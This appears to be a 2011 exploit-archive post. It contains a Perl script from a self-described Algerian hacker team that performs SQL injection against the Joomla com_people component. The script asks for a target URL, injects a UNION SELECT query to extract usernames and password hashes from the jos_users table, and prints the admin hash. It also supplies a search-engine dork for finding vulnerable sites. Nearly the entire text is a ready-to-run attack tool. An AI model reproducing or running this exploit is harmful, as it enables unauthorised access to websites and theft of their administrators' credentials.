[D] Perl :Joomla com_people(details) Sql injection Vulnerabilities [z]
2011-01-22 16:04:59Inviato da: kedans
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah }-=-=-=-=-=-=-=-=-=-=-=
# [D] Perl :Joomla com_people(details) Sql injection Vulnerabilities [z]
# DIVLOPER : KedAns-Dz < Ked-H (at) Hotmail (dot) com
# Team : [D] HaCkErS-StreeT-Team [Z]
# + Allah Akbarr + Algerians HaCkErs
# Type : Perl
:::::::::::::::::::::::::::::::::(0xSTART)::::::::::::::::::::::::::::::::::::::::
#!/usr/bin/perl -w
#========================================
#Joomla com_doqment (details) Sql injection
#Author : Salvatore Fresta aka Drosophila
#Divloper Perl : KedAns
#Gre4tz: All HaCkerS-StreeT-Team DZ
#Special Gre4tz: Dr.Ride + Red1One + Islampard
#=========================================
#START SYSTEM /root@MSdos/ :
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "|----------------------------------------------------|\n";
print "| KedAns ' Joomla com_people SQL Injection ' |\n";
print "| |\n";
print "| Divloper : KedAns-Dz |\n";
print "| |\n";
print "| Special ThanX f4r : exploit-db.com & bugsearch.net |\n";
print "| |\n";
print "| Team : [D] HaCkerS-StreeT-Team [Z] |\n";
print "| |\n";
print "| Special GreeTz : Dr.Ride + Islampard + BadR0 |\n";
print "| |\n";
print "| E-Mails : ked-h (at) hotmail (dot) com |\n";
print "| |\n";
print "| : k-_-k1 (at) live (dot) fr |\n";
print "|----------------------------------------------------|\n";
print " \n";
sleep(3);
print " \n";
print "|===========================================|\n";
print "[+] Vendor : http://www.joomla.com\n";
print "[+] Download : http://www.joomla.com\n";
print "[+] Vulnerability : SQL Vulnerability\n";
print "[+] Dork : inurl:com_people \n";
print "[+] allintext:Powered by Joomla. \n";
print "|===========================================|\n";
print " \n";
sleep(1);
use LWP::UserAgent;
print "\n SQL> Target:(http://target.com/path/) : ";
chomp(my $target=<STDIN>);
#Nome Column
$kontol="concat(username,0x3a,password)";
#Nome Table
$memek="jos_users";
$ngentot="-11/**/union/**/select/**/";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "index.php?option=com_people&controller=people&task=details&id=".$ngentot."1,2,".$kontol.",4,5,6,7,8/**/from/**/".$memek."--";
sleep(1);
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "Exploit succeeded !! ...\n";
sleep(1);
print "\n[+] Admin Hash : $1\n\n";
print "\n";
print "..:: By KedAns-Dz ::.\n";
print "\n";
print " ->> [D] HaCkerS-StreeT-Team [Z] ";
print "Allaho Akbar\n";
print "\n";
}
else{print "\n[-] Errur Exploit!...\n";
}
# By KedAns-Dz
:::::::::::::::::::::::::::::(0xEOF):::::::::::::::::::::::::::::::::::::::
# [D] HaCkerS-StreeT-Team [Z] > Algerians HaCkErs <
-- [>>] KedAns-Dz * BadR0 * XoreR * Dr.Ride * Fox-Dz * Red1One [<<] --
-- [>] IslamPard * NoR0 FouinY * Zaki.ENG * Hani NiN0 * MasSinh0u-Dz [<] --
-- ]]] Mr.Dak007 * TOnyXED * Ctika_06 * Dr.html * Sh311@dz * all Dz [[[ --
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.